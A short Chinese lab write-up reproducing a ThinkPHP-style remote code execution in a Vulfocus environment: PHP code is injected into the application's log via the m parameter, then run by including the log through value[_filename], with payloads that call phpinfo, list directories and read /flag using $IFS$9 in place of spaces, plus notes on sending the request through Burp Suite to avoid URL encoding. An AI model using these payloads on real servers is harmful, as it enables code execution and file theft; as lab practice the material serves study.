漏洞复现:

启动vulfocus。

poc

/index.php?m=--><?=phpinfo();?>
/index.php?m=--><?=system('ls ');?>
/index.php?m=--><?=system('cat$IFS$9`ls` ');?>
/index.php?m=--><?=system('ls$IFS$9/');?>
/index.php?m=--><?=system('cat$IFS$9/flag');?>
#上面先传入log文件,下面文件包含。
/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_09.log

Untitled

报错

Untitled

同样报错?????

错误的内容的确传入进去了,可以看到传入的内容进行了url编码。


不使用浏览器进行利用,直接打开burpsuite进行抓包,同样的方式利用成功。

注意点:一开始的包会进行url编码。

Untitled

改成正常的格式发包即可。

Untitled

漏洞利用成功。

Untitled

/index.php?m=--><?=system('ls$IFS$9/tmp');?>